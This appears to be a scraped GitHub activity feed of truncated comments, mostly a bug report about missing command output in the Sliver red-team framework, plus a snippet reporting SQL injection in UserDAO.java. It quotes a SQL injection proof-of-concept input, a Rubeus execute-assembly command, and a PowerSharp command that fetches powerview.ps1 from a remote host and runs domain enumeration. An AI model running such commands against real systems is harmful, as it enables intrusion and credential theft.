Winslow

In UserDAO.java, multiple parameters such as user, pass, etc. are vulnerable to SQL injection vulnerability. PoC: Set value of parameter 'user' as **` ' --`** In CustomerDAO.java, multiple parameters such...

A reference: https://github.com/sliverarmory/armory/issues/27#issuecomment-1376409950

The same result ``` sliver (STRAIGHT_WILLOW) > execute-assembly -i -M -E /opt/red/rubeus.exe hash /password:123 [*] Output: ```

Additional information: I cannot get any output from Sliver cli, however, the output can be displayed in the process, such as the powershell cli. I used a powershell download cradle...

@MrAle98 I am using the latest version, and manually modified few files to include the powershell command ``` All hackers gain exalted [*] Server v1.5.33 - 79ff35429dd48d361a13c447342966292210ab4f - Dirty [*]...

I tried with latest binary release, it does not have the issue. Thanks for your suggestion. @MrAle98 @rkervella

@MrAle98 I made modifications based on the comparison

Okay, I find there is inconsistence between sessions. I am using the official latest version. The SYSTEM session has output, while other users' session (including local admin) do not have....

@rkervella @moloch-- Hope you are doing well! Here is an update: I compiled the latest source code without any modification, and the issue still exists. The following session is obtained...

> Try > > ``` > execute-assembly powersharp.exe -- "/m:http://192.168.0.44:81/powerview.ps1" "/c:get-netcomputer -identity web01" > ``` > > Same results? Thanks for your quick response! Yes, still the issue ``` [server]...